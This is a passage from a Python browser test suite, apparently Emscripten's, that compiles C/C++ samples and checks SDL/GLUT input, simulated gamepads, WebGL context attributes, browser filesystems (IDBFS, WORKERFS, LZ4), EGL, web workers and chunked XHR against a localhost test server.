0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
self.compile_btest([test_file('sdl_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS', '-O2', '--minify=0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_glut_touchevents(self):
self.btest('glut_touchevents.c', '1', args=['-lglut'])
def test_glut_wheelevents(self):
self.btest('glut_wheelevents.c', '1', args=['-lglut'])
@requires_graphics_hardware
def test_glut_glutget_no_antialias(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_graphics_hardware
def test_glut_glutget(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
def test_sdl_joystick_1(self):
# Generates events corresponding to the Working Draft of the HTML5 Gamepad API.
# http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface
create_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0;
};
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button] = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button] = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.compile_btest([test_file('sdl_joystick.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
def test_sdl_joystick_2(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.compile_btest([test_file('sdl_joystick.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_glfw_joystick(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
var gamepad = {
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
};
gamepads.push(gamepad)
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
// Dispatch event (required for glfw joystick; note not used in SDL test)
var event = new Event('gamepadconnected');
event.gamepad = gamepad;
window.dispatchEvent(event);
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.compile_btest([test_file('test_glfw_joystick.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lGL', '-lglfw3', '-s', 'USE_GLFW=3'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_webgl_context_attributes(self):
# Javascript code to check the attributes support we want to test in the WebGL implementation
# (request the attribute, create a context and check its value afterwards in the context attributes).
# Tests will succeed when an attribute is not supported.
create_file('check_webgl_attributes_support.js', '''
mergeInto(LibraryManager.library, {
webglAntialiasSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {antialias: true});
attributes = context.getContextAttributes();
return attributes.antialias;
},
webglDepthSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {depth: true});
attributes = context.getContextAttributes();
return attributes.depth;
},
webglStencilSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {stencil: true});
attributes = context.getContextAttributes();
return attributes.stencil;
},
webglAlphaSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {alpha: true});
attributes = context.getContextAttributes();
return attributes.alpha;
}
});
''')
# Copy common code file to temporary directory
filepath = test_file('test_webgl_context_attributes_common.c')
temp_filepath = os.path.join(self.get_dir(), os.path.basename(filepath))
shutil.copyfile(filepath, temp_filepath)
# perform tests with attributes activated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl2.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-s', 'USE_SDL=2', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglfw', '-lGLEW'])
# perform tests with attributes desactivated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglfw', '-lGLEW'])
@requires_graphics_hardware
def test_webgl_no_double_error(self):
self.btest('webgl_error.cpp', '0')
@requires_graphics_hardware
def test_webgl_parallel_shader_compile(self):
self.btest('webgl_parallel_shader_compile.cpp', '1')
@requires_graphics_hardware
def test_webgl_explicit_uniform_location(self):
self.btest('webgl_explicit_uniform_location.c', '1', args=['-s', 'GL_EXPLICIT_UNIFORM_LOCATION=1', '-s', 'MIN_WEBGL_VERSION=2'])
# Test that -s GL_PREINITIALIZED_CONTEXT=1 works and allows user to set Module['preinitializedWebGLContext'] to a preinitialized WebGL context.
@requires_graphics_hardware
def test_preinitialized_webgl_context(self):
self.btest('preinitialized_webgl_context.cpp', '5', args=['-s', 'GL_PREINITIALIZED_CONTEXT', '--shell-file', test_file('preinitialized_webgl_context.html')])
@requires_threads
def test_emscripten_get_now(self):
for args in [[], ['-s', 'USE_PTHREADS'], ['-s', 'ENVIRONMENT=web', '-O2', '--closure=1']]:
self.btest('emscripten_get_now.cpp', '1', args=args)
def test_write_file_in_environment_web(self):
self.btest_exit('write_file.c', args=['-s', 'ENVIRONMENT=web', '-Os', '--closure=1'])
def test_fflush(self):
self.btest('test_fflush.cpp', '0', args=['-s', 'EXIT_RUNTIME', '--shell-file', test_file('test_fflush.html')], reporting=Reporting.NONE)
def test_file_db(self):
secret = str(time.time())
create_file('moar.txt', secret)
self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST'])
shutil.copyfile('test.html', 'first.html')
self.btest('file_db.cpp', secret, args=['-s', 'FORCE_FILESYSTEM'])
shutil.copyfile('test.html', 'second.html')
create_file('moar.txt', 'aliantha')
self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it
shutil.move('test.html', 'third.html')
def test_fs_idbfs_sync(self):
for extra in [[], ['-DEXTRA_WORK']]:
secret = str(time.time())
self.btest(test_file('fs', 'test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=[_main,_test,_success]', '-lidbfs.js'])
self.btest(test_file('fs', 'test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=[_main,_test,_success]', '-lidbfs.js'] + extra)
def test_fs_idbfs_sync_force_exit(self):
secret = str(time.time())
self.btest(test_file('fs', 'test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=[_main,_test,_success]', '-s', 'EXIT_RUNTIME', '-DFORCE_EXIT', '-lidbfs.js'])
self.btest(test_file('fs', 'test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=[_main,_test,_success]', '-s', 'EXIT_RUNTIME', '-DFORCE_EXIT', '-lidbfs.js'])
def test_fs_idbfs_fsync(self):
# sync from persisted state into memory before main()
create_file('pre.js', '''
Module.preRun = function() {
addRunDependency('syncfs');
FS.mkdir('/working1');
FS.mount(IDBFS, {}, '/working1');
FS.syncfs(true, function (err) {
if (err) throw err;
removeRunDependency('syncfs');
});
};
''')
args = ['--pre-js', 'pre.js', '-lidbfs.js', '-s', 'EXIT_RUNTIME', '-s', 'ASYNCIFY']
secret = str(time.time())
self.btest(test_file('fs', 'test_idbfs_fsync.c'), '1', args=args + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=[_main,_success]', '-lidbfs.js'])
self.btest(test_file('fs', 'test_idbfs_fsync.c'), '1', args=args + ['-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=[_main,_success]', '-lidbfs.js'])
def test_fs_memfs_fsync(self):
args = ['-s', 'ASYNCIFY', '-s', 'EXIT_RUNTIME']
secret = str(time.time())
self.btest(test_file('fs', 'test_memfs_fsync.c'), '1', args=args + ['-DSECRET=\"' + secret + '\"'])
def test_fs_workerfs_read(self):
secret = 'a' * 10
secret2 = 'b' * 10
create_file('pre.js', '''
var Module = {};
Module.preRun = function() {
var blob = new Blob(['%s']);
var file = new File(['%s'], 'file.txt');
FS.mkdir('/work');
FS.mount(WORKERFS, {
blobs: [{ name: 'blob.txt', data: blob }],
files: [file],
}, '/work');
};
''' % (secret, secret2))
self.btest(test_file('fs', 'test_workerfs_read.c'), '1', args=['-lworkerfs.js', '--pre-js', 'pre.js', '-DSECRET=\"' + secret + '\"', '-DSECRET2=\"' + secret2 + '\"', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_workerfs_package(self):
create_file('file1.txt', 'first')
ensure_dir('sub')
open(os.path.join('sub', 'file2.txt'), 'w').write('second')
self.run_process([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', os.path.join('sub', 'file2.txt'), '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_workerfs_package.cpp'), '1', args=['-lworkerfs.js', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_lz4fs_package(self):
# generate data
ensure_dir('subdir')
create_file('file1.txt', '0123456789' * (1024 * 128))
open(os.path.join('subdir', 'file2.txt'), 'w').write('1234567890' * (1024 * 128))
random_data = bytearray(random.randint(0, 255) for x in range(1024 * 128 * 10 + 1))
random_data[17] = ord('X')
open('file3.txt', 'wb').write(random_data)
# compress in emcc, -s LZ4=1 tells it to tell the file packager
print('emcc-normal')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt'])
assert os.path.getsize('file1.txt') + os.path.getsize(os.path.join('subdir', 'file2.txt')) + os.path.getsize('file3.txt') == 3 * 1024 * 128 * 10 + 1
assert os.path.getsize('test.data') < (3 * 1024 * 128 * 10) / 2 # over half is gone
print(' emcc-opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt', '-O2'])
# compress in the file packager, on the server. the client receives compressed data and can just use it. this is typical usage
print('normal')
out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--lz4'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM'])
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-O2'])
print(' modularize')
self.compile_btest([test_file('fs', 'test_lz4fs.cpp'), '--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-s', 'MODULARIZE=1'])
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
Module()
</script>
''')
self.run_browser('a.html', '.', '/report_result?2')
# load the data into LZ4FS manually at runtime. This means we compress on the client. This is generally not recommended
print('manual')
subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM'])
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-O2'])
print(' opts+closure')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-O2', '--closure=1', '-g1', '-s', 'CLOSURE_WARNINGS=quiet'])
'''# non-lz4 for comparison
try:
os.mkdir('files')
except OSError:
pass
shutil.copyfile('file1.txt', os.path.join('files', 'file1.txt'))
shutil.copyfile('file2.txt', os.path.join('files', 'file2.txt'))
shutil.copyfile('file3.txt', os.path.join('files', 'file3.txt'))
out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'files/file1.txt', 'files/file2.txt', 'files/file3.txt'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js'])'''
def test_separate_metadata_later(self):
# see issue #6654 - we need to handle separate-metadata both when we run before
# the main program, and when we are run later
create_file('data.dat', ' ')
self.run_process([FILE_PACKAGER, 'more.data', '--preload', 'data.dat', '--separate-metadata', '--js-output=more.js'])
self.btest(os.path.join('browser', 'separate_metadata_later.cpp'), '1', args=['-s', 'FORCE_FILESYSTEM'])
def test_idbstore(self):
secret = str(time.time())
for stage in [0, 1, 2, 3, 0, 1, 2, 0, 0, 1, 4, 2, 5]:
self.clear()
self.btest(test_file('idbstore.c'), str(stage), args=['-lidbstore.js', '-DSTAGE=' + str(stage), '-DSECRET=\"' + secret + '\"'])
def test_idbstore_sync(self):
secret = str(time.time())
self.clear()
self.btest(test_file('idbstore_sync.c'), '6', args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '-s', 'ASYNCIFY'])
def test_idbstore_sync_worker(self):
secret = str(time.time())
self.clear()
self.btest(test_file('idbstore_sync_worker.c'), '6', args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '--proxy-to-worker', '-s', 'INITIAL_MEMORY=80MB', '-s', 'ASYNCIFY'])
def test_force_exit(self):
self.btest('force_exit.c', expected='17', args=['-s', 'EXIT_RUNTIME'])
def test_sdl_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest_exit('sdl_pumpevents.c', assert_returncode=7, args=['--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_canvas_size(self):
self.btest('sdl_canvas_size.c', expected='1',
args=['-O2', '--minify=0', '--shell-file',
test_file('sdl_canvas_size.html'), '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_gl_read(self):
# SDL, OpenGL, readPixels
self.compile_btest([test_file('sdl_gl_read.c'), '-o', 'something.html', '-lSDL', '-lGL'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl_gl_mapbuffers(self):
self.btest('sdl_gl_mapbuffers.c', expected='1', args=['-s', 'FULL_ES3=1', '-lSDL', '-lGL'],
message='You should see a blue triangle.')
@requires_graphics_hardware
def test_sdl_ogl(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_regal(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-s', 'USE_REGAL', '-DUSE_REGAL', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_defaultmatrixmode(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['--minify=0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_p(self):
# Immediate mode with pointers
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_proc_alias(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '-g2', '-s', 'INLINING_LIMIT', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_fog_simple(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_negative(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_density(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_exp2(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_linear(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_glfw(self):
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION', '-lglfw', '-lGL'])
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_minimal(self):
self.btest('glfw_minimal.c', '1', args=['-lglfw', '-lGL'])
self.btest('glfw_minimal.c', '1', args=['-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_time(self):
self.btest('test_glfw_time.c', '1', args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'])
def _test_egl_base(self, *args):
self.compile_btest([test_file('test_egl.c'), '-O2', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_egl(self):
self._test_egl_base()
@requires_threads
@requires_graphics_hardware
def test_egl_with_proxy_to_pthread(self):
self._test_egl_base('-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'OFFSCREEN_FRAMEBUFFER')
def _test_egl_width_height_base(self, *args):
self.compile_btest([test_file('test_egl_width_height.c'), '-O2', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
self.run_browser('page.html', 'Should print "(300, 150)" -- the size of the canvas in pixels', '/report_result?1')
def test_egl_width_height(self):
self._test_egl_width_height_base()
@requires_threads
def test_egl_width_height_with_proxy_to_pthread(self):
self._test_egl_width_height_base('-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD')
@requires_graphics_hardware
def test_egl_createcontext_error(self):
self.btest('test_egl_createcontext_error.c', '1', args=['-lEGL', '-lGL'])
def test_worker(self):
# Test running in a web worker
create_file('file.dat', 'data for worker')
html_file = open('main.html', 'w')
html_file.write('''
<html>
<body>
Worker Test
<script>
var worker = new Worker('worker.js');
worker.onmessage = function(event) {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data);
xhr.send();
setTimeout(function() { window.close() }, 1000);
};
</script>
</body>
</html>
''' % self.port)
html_file.close()
for file_data in [1, 0]:
cmd = [EMCC, test_file('hello_world_worker.cpp'), '-o', 'worker.js'] + (['--preload-file', 'file.dat'] if file_data else [])
print(cmd)
self.run_process(cmd)
self.assertExists('worker.js')
self.run_browser('main.html', '', '/report_result?hello from worker, and :' + ('data for w' if file_data else '') + ':')
self.assertContained('you should not see this text when in a worker!', self.run_js('worker.js')) # code should run standalone too
@no_firefox('keeps sending OPTIONS requests, and eventually errors')
def test_chunked_synchronous_xhr(self):
main = 'chunked_sync_xhr.html'
worker_filename = "download_and_checksum_worker.js"
html_file = open(main, 'w')
html_file.write(r"""
<!doctype html>
<html>
<head><meta charset="utf-8"><title>Chunked XHR</title></head>
<html>
<body>
Chunked XHR Web Worker Test
<script>
var worker = new Worker(""" + json.dumps(worker_filename) + r""");
var buffer = [];
worker.onmessage = function(event) {
if (event.data.channel === "stdout") {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://localhost:%s/report_result?' + event.data.line);
xhr.send();
setTimeout(function() { window.close() }, 1000);
} else {
if (event.data.trace) event.data.trace.split("\n").map(function(v) { console.error(v); });
if (event.data.line) {
console.error(event.data.line);
} else {
var v = event.data.char;
if (v == 10) {
var line = buffer.splice(0);
console.error(line = line.map(function(charCode){return String.fromCharCode(charCode);}).join(''));
} else {
buffer.push(v);
}
}
}
};
</script>
</body>
</html>
""" % self.port)
html_file.close()
c_source_filename = "checksummer.c"
prejs_filename = "worker_prejs.js"
prejs_file = open(prejs_filename, 'w')
prejs_file.write(r"""
if (typeof(Module) === "undefined") Module = {};
Module["arguments"] = ["/bigfile"];
Module["preInit"] = function() {
FS.createLazyFile('/', "bigfile", "http://localhost:11111/bogus_file_path", true, false);
};
var doTrace = true;
Module["print"] = function(s) { self.postMessage({channel: "stdout", line: s}); };
Module["printErr"] = function(s) { self.postMessage({channel: "stderr", char: s, trace: ((doTrace && s === 10) ? new Error().stack : null)}); doTrace = false; };
""")
prejs_file.close()
# vs. os.path.join(self.get_dir(), filename)
# vs. test_file('hello_world_gles.c')
self.compile_btest([test_file(c_source_filename), '-g', '-s', 'SMALL_XHR_CHUNKS', '-o', worker_filename,
'--pre-js', prejs_filename])
chunkSize = 1024
data = os.urandom(10 * chunkSize + 1) # 10 full chunks and one 1 byte chunk
checksum = zlib.adler32(data) & 0xffffffff # Python 2 compatibility: force bigint
server = multiprocessing.Process(target=test_chunked_synchronous_xhr_server, args=(True, chunkSize, data, checksum, self.port))
server.start()
# block until the server is actually ready
for i in range(60):
try:
urlopen('http://localhost:11111')
break
except Exception as e:
print('(sleep for server)')
time.sleep(1)
if i == 60:
raise e
try:
self.run_browser(main, 'Chunked binary synchronous XHR in Web Workers!', '/report_result?' + str(checksum))
finally:
server.terminate()
# Avoid race condition on cleanup, wait a bit so that processes have released file locks so that test tearDown won't
# attempt to rmdir() files in use.
if WINDOWS:
time.sleep(2)
@requires_graphics_hardware
def test_glgears(self, extra_args=[]):
self.btest('hello_world_gles.c', reference='gears.png', reference_slack=3,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'] + extra_args)
@requires_graphics_hardware
@requires_threads
def test_glgears_pthreads(self, extra_args=[]):
# test that a program that doesn't use pthreads still works with with pthreads enabled
# (regression test for https://github.com/emscripten-core/emscripten/pull/8059#issuecomment-488105672)
self.test_glgears(['-s', 'USE_PTHREADS'])
@requires_graphics_hardware
def test_glgears_long(self):
for proxy in [0, 1]:
print('proxy', proxy)
self.btest('hello_world_gles.c', expected=list(map(str, range(15, 500))), args=['-DHAVE_BUILTIN_SINCOS', '-DLONGTEST', '-lGL', '-lglut', '-DANIMATE'] + (['--proxy-to-worker'] if proxy else []))
@requires_graphics_hardware
def test_glgears_animation(self):
es2_suffix = ['', '_full', '_full_944']
for full_es2 in [0, 1, 2]:
print(full_es2)
self.compile_btest([test_file('hello_world_gles%s.c' % es2_suffix[full_es2]), '-o', 'something.html',
'-DHAVE_BUILTIN_SINCOS', '-s', 'GL_TESTING', '-lGL', '-lglut',
'--shell-file', test_file('hello_world_gles_shell.html')] +
(['-s', 'FULL_ES2=1'] if full_es2 else []))
self.run_browser('something.html', 'You should see animating gears.', '/report_gl_result?true')
@requires_graphics_hardware
def test_fulles2_sdlproc(self):
self.btest_exit('full_es2_sdlproc.c', assert_returncode=1, args=['-s', 'GL_TESTING', '-DHAVE_BUILTIN_SINCOS', '-s', 'FULL_ES2', '-lGL', '-lSDL', '-lglut'])
@requires_graphics_hardware
def test_glgears_deriv(self):
self.btest('hello_world_gles_deriv.c', reference='gears.png', reference_slack=2,
args=['-DHAVE_BUILTIN_SINCOS', '-lGL', '-lglut'],
message='You should see animating gears.')
with open('test.html') as f:
